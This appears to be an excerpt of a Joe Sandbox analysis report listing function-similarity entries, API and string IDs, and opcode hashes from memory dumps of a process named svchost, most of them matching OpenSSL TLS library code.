                                                                                              • API String ID: 193678381-2390203159
                                                                                              • Opcode ID: 3e759472102663428d332e0c0f1ec7d766e9aceebfea9d6430f504463523da80
                                                                                              • Instruction ID: 102ef2c92e5f0b2b37a74bb51170bd27d9b89ec89e92c48a41e8ef61650bb3dd
                                                                                              • Opcode Fuzzy Hash: 3e759472102663428d332e0c0f1ec7d766e9aceebfea9d6430f504463523da80
                                                                                              • Instruction Fuzzy Hash: D811C6A1F1A14282F791D776F5517FE2250AF447C0F488431DF2C476A7DE2DD8958600
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ossl_get_max_early_data$ssl\record\rec_layer_s3.c
                                                                                              • API String ID: 193678381-4099276626
                                                                                              • Opcode ID: c6dfb0372a35b94570650d86b783ddb20b63f58534f8dc10c92d57d746d52ad2
                                                                                              • Instruction ID: 48499649b9ca7d9a1e42feedbe1467a9752f99a6b341db9b609f31372855818e
                                                                                              • Opcode Fuzzy Hash: c6dfb0372a35b94570650d86b783ddb20b63f58534f8dc10c92d57d746d52ad2
                                                                                              • Instruction Fuzzy Hash: F8011BB2A0B141CBE7A7DB75C4957BC2790EB44B48F588435CE2C8A6A1DF2CA9C6C611
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 64941C95
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 64941CD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentThread
                                                                                              • String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
                                                                                              • API String ID: 2882836952-884133013
                                                                                              • Opcode ID: 4ee0d97755dc30819cc537833119c3faf73e6318be0a8baa9e96090fdbdd1b5a
                                                                                              • Instruction ID: a46da822108b5d6275fe5987b69bee3bdd31e53238ff1fe5d77ed74437cca604
                                                                                              • Opcode Fuzzy Hash: 4ee0d97755dc30819cc537833119c3faf73e6318be0a8baa9e96090fdbdd1b5a
                                                                                              • Instruction Fuzzy Hash: 6B018F7A38470086EB10DF26F840B4A3BA5F399F98F048225DD4C43710EB39C526C710
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_snprintf
                                                                                              • String ID: %-30s %-7s Kx=%-8s Au=%-5s Enc=%-22s Mac=%-4s$RC2(128)$SHA256
                                                                                              • API String ID: 3142812517-4065257412
                                                                                              • Opcode ID: ec9a1fd387941a3c2f00c79377d3d867282fdbe4ba62111515321fb465be5215
                                                                                              • Instruction ID: 2e6aad7903663a8ba1399f85a51017368b632e6112d4b5c33384acbf4f3ec462
                                                                                              • Opcode Fuzzy Hash: ec9a1fd387941a3c2f00c79377d3d867282fdbe4ba62111515321fb465be5215
                                                                                              • Instruction Fuzzy Hash: F5019AB6C4E68A81E2728735F4450A9A7A0FB40750F448137EDAC13A788F3DE941D200
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_snprintf
                                                                                              • String ID: %-30s %-7s Kx=%-8s Au=%-5s Enc=%-22s Mac=%-4s$IDEA(128)$SHA256
                                                                                              • API String ID: 3142812517-2241050542
                                                                                              • Opcode ID: 3500ee2869abb935871492220813c3d45dcff8058647e0efeab3f62648fd7570
                                                                                              • Instruction ID: 746107fa7ca61b3a920ae003f94c0a29bd1eab6c2c709e9f2d26f109194c12f0
                                                                                              • Opcode Fuzzy Hash: 3500ee2869abb935871492220813c3d45dcff8058647e0efeab3f62648fd7570
                                                                                              • Instruction Fuzzy Hash: B2019AB6C4E68A81E2728735F4450A9A7A0FB40750F488137EDAC13A788F3DED41D244
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_snprintf
                                                                                              • String ID: %-30s %-7s Kx=%-8s Au=%-5s Enc=%-22s Mac=%-4s$DES(56)$SHA256
                                                                                              • API String ID: 3142812517-3620607540
                                                                                              • Opcode ID: 23d6b098104fdcf4299d09d061bccc979f89490e296102d26d9a84bde5bebe8b
                                                                                              • Instruction ID: 54f6180ebb8b1ab0df11733e37ed36cd3063374c7ee17fff165a30a4a25a8bba
                                                                                              • Opcode Fuzzy Hash: 23d6b098104fdcf4299d09d061bccc979f89490e296102d26d9a84bde5bebe8b
                                                                                              • Instruction Fuzzy Hash: E7019AB6C4E68A81E2728735F4450A9A7A0FB40750F448137EDAC13A788F3DE991D200
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_snprintf
                                                                                              • String ID: %-30s %-7s Kx=%-8s Au=%-5s Enc=%-22s Mac=%-4s$RC4(128)$SHA256
                                                                                              • API String ID: 3142812517-1386952729
                                                                                              • Opcode ID: 23d6b098104fdcf4299d09d061bccc979f89490e296102d26d9a84bde5bebe8b
                                                                                              • Instruction ID: 592b12f1a067c901fcfb57467b18c5bde1e184e1ee9c125425c5054dcd397fe3
                                                                                              • Opcode Fuzzy Hash: 23d6b098104fdcf4299d09d061bccc979f89490e296102d26d9a84bde5bebe8b
                                                                                              • Instruction Fuzzy Hash: E3019AB6C4E68A81E2728735F4450AAA7A0FB40750F448137EDAC13A788F3DE941D200
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_snprintf
                                                                                              • String ID: %-30s %-7s Kx=%-8s Au=%-5s Enc=%-22s Mac=%-4s$3DES(168)$SHA256
                                                                                              • API String ID: 3142812517-1945505136
                                                                                              • Opcode ID: 511d42cbf8a54ebef7692f5742980d996ed1f35e61bb5bb9d41387b9466817a4
                                                                                              • Instruction ID: 5b1386a698503138e07b3da3fda07b8bd93d1d2178a98ab49c394159c76661c7
                                                                                              • Opcode Fuzzy Hash: 511d42cbf8a54ebef7692f5742980d996ed1f35e61bb5bb9d41387b9466817a4
                                                                                              • Instruction Fuzzy Hash: 87019AB6C4E68A81E2728735F4450A9ABA0FB40750F448137EDAC13A788F3DE941D200
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\record\methods\tls_common.c$tls_increment_sequence_ctr
                                                                                              • API String ID: 193678381-4116607248
                                                                                              • Opcode ID: 1c3c50427a3f35b97d7c239b30150f931c64e864396e14f676402aef77204413
                                                                                              • Instruction ID: bae96aa21cd1294fb82c532d1feb1a0c3833d8c3a3ee6f970c146af61584c123
                                                                                              • Opcode Fuzzy Hash: 1c3c50427a3f35b97d7c239b30150f931c64e864396e14f676402aef77204413
                                                                                              • Instruction Fuzzy Hash: 92F081A1E1714146FB5397B5D8526F822519F94720F84C631CE3C427E2EE6C99C5C350
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printf
                                                                                              • String ID: %02X$%s (len=%d):
                                                                                              • API String ID: 601296420-4138326432
                                                                                              • Opcode ID: 36ce234d46d02148adacb22844c03ffa6f053384a5186d88df06f53ea04c3649
                                                                                              • Instruction ID: 134997aca158a5eed0dc94caf7e6a216d6abc4e0a66ef7fab081dc2ac2009ba0
                                                                                              • Opcode Fuzzy Hash: 36ce234d46d02148adacb22844c03ffa6f053384a5186d88df06f53ea04c3649
                                                                                              • Instruction Fuzzy Hash: 7601D4A1B5EB9285EA22DB66E58006CA711EB44FC0F089031EE5C07B6ACF6CD4068700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ossl_statem_server_process_message$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 193678381-722880742
                                                                                              • Opcode ID: b17f0a67d53f0966aecb426769ce5c119c87242601565f59d85da2248e087f37
                                                                                              • Instruction ID: e229eacfc1d514b156cb65986a206aa1e0f9f6892fe4285ed36a79a125531e3d
                                                                                              • Opcode Fuzzy Hash: b17f0a67d53f0966aecb426769ce5c119c87242601565f59d85da2248e087f37
                                                                                              • Instruction Fuzzy Hash: C0F0F461A5A18286D602D775E8916BC6710AF44788F448532EF6C872F3DE3CE5468700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_construct_key_update
                                                                                              • API String ID: 1390262125-2630406174
                                                                                              • Opcode ID: 65d52cba1d89d2184b94278aeb36dc7ab1b11dbce64f3e7fa5f1c36f01e04e7a
                                                                                              • Instruction ID: e3d6e9a1cfab71bc9b757ac423e61c3d9bd8692cb58af241efd4e8eb345baa81
                                                                                              • Opcode Fuzzy Hash: 65d52cba1d89d2184b94278aeb36dc7ab1b11dbce64f3e7fa5f1c36f01e04e7a
                                                                                              • Instruction Fuzzy Hash: 2DF0B4E1F4A24382F762A7B7D9927F812409F44790F448431DD3C87BE2EE6D95D54710
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                              • API String ID: 1646373207-328863460
                                                                                              • Opcode ID: bc905c6d137a0c53196b9c0bd09bc0aeaa0806cc2f24fc447d6273a82a917542
                                                                                              • Instruction ID: 41b3a94f408f7bae3b9d725e5a4e0a0769d76ac245e5e7c58dbb607d6e734eb2
                                                                                              • Opcode Fuzzy Hash: bc905c6d137a0c53196b9c0bd09bc0aeaa0806cc2f24fc447d6273a82a917542
                                                                                              • Instruction Fuzzy Hash: 64F05E107D2A04D5FE19DF72E88A37127E6AB56788FC40526841D063A0EF3DC276C320
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A92F
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A947
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A98D
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A9A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: set_client_ciphersuite$ssl\statem\statem_clnt.c
                                                                                              • API String ID: 4275876640-3316213183
                                                                                              • Opcode ID: e987dac0bce8b29c2390622b79a2f18fa0c291ade97ad151bb8bc7c638c4f201
                                                                                              • Instruction ID: e96189090f666b4316ce0af22d0f85da212791ef152165a0e69f810357469a7f
                                                                                              • Opcode Fuzzy Hash: e987dac0bce8b29c2390622b79a2f18fa0c291ade97ad151bb8bc7c638c4f201
                                                                                              • Instruction Fuzzy Hash: 10F02BA2B1A64244E352E776E4427BD1350DF487C0F448431EE2C43BA3DD3DD4454740
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_construct_change_cipher_spec
                                                                                              • API String ID: 1390262125-1264406544
                                                                                              • Opcode ID: 4c33a64a7ef8f1b7b3c829877a7a0917372e19b8aa19b288ad8304aa62e7efac
                                                                                              • Instruction ID: 0459a758b54eeee1e0cfe2eb5d620b506fa10208c5b5b9f6fe7184b76219266a
                                                                                              • Opcode Fuzzy Hash: 4c33a64a7ef8f1b7b3c829877a7a0917372e19b8aa19b288ad8304aa62e7efac
                                                                                              • Instruction Fuzzy Hash: 85F01CE1F1A14286FB67A3B2D8927F912409F98780F448831DE2CC77A2EE6DA5D64750
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ossl_statem_client_construct_message$ssl\statem\statem_clnt.c
                                                                                              • API String ID: 193678381-2151371605
                                                                                              • Opcode ID: dc44a18737892bb6ca68322c2d90c9761d0f3f508ca1e12f43bb6e69322129c0
                                                                                              • Instruction ID: b7aba156e9c4a21ffab01cb3ae60b34ec036141e5f07e26eb3f323ed36da42b1
                                                                                              • Opcode Fuzzy Hash: dc44a18737892bb6ca68322c2d90c9761d0f3f508ca1e12f43bb6e69322129c0
                                                                                              • Instruction Fuzzy Hash: 17F090A2E4A54286E31293B5D886AF82750DF44798F44C931EE2D877F2DE1D96878200
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_construct_end_of_early_data
                                                                                              • API String ID: 1390262125-1184863746
                                                                                              • Opcode ID: 0c5cd1865cee1c296b5e24ba19347e5ad3a2e43974ec7d2134c3ec4f50494873
                                                                                              • Instruction ID: edd2aa5e3bf0b396d4b412140a7ae1bb612e7e1b9f309a30aab3320f5275cc73
                                                                                              • Opcode Fuzzy Hash: 0c5cd1865cee1c296b5e24ba19347e5ad3a2e43974ec7d2134c3ec4f50494873
                                                                                              • Instruction Fuzzy Hash: E4F082E1E1A18283E352DBB5D8867F822509F44754F48C931DE2C876F2DE6DA9CA8710
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFBAB488171
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB488189
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: read_state_machine$ssl\statem\statem.c
                                                                                              • API String ID: 1390262125-2676740512
                                                                                              • Opcode ID: ed3bc549ff9b318cf91dc269b9fb4ae0094196de91c5771c2781463e6c9ae1fe
                                                                                              • Instruction ID: ef8c3edff01fd83b770f6a8d19198fdc43a68a880b138104fc2c28de81d6f6a1
                                                                                              • Opcode Fuzzy Hash: ed3bc549ff9b318cf91dc269b9fb4ae0094196de91c5771c2781463e6c9ae1fe
                                                                                              • Instruction Fuzzy Hash: DBF08262B1E68245FB539775E9917BD17109B49768F448432CF6D469E3DD3C848A8300
                                                                                              APIs
                                                                                              • BIO_indent.LIBCRYPTO-3-X64 ref: 00007FFBAB440FAA
                                                                                              • BIO_printf.LIBCRYPTO-3-X64 ref: 00007FFBAB440FDD
                                                                                                • Part of subcall function 00007FFBAB441090: BIO_printf.LIBCRYPTO-3-X64(?,00007FFBAB43ECDD), ref: 00007FFBAB4410D4
                                                                                                • Part of subcall function 00007FFBAB441090: BIO_printf.LIBCRYPTO-3-X64(?,00007FFBAB43ECDD), ref: 00007FFBAB4410EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printf$O_indent
                                                                                              • String ID: %s (%d)$unexpected value
                                                                                              • API String ID: 1715996925-1289549259
                                                                                              • Opcode ID: 6655d82fb737ad4558221fe7d857a957b5f4ea2486deba5950a07bd41afc27a2
                                                                                              • Instruction ID: 789b9536cce61a2758f0500748361e7ad1959e5244c693613dafe8ba4ca4e872
                                                                                              • Opcode Fuzzy Hash: 6655d82fb737ad4558221fe7d857a957b5f4ea2486deba5950a07bd41afc27a2
                                                                                              • Instruction Fuzzy Hash: 99F062B0A1E64283EB2A9B75D4515BC2A51BF44B84F44C031DE6D07BB58E7CA561D704
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
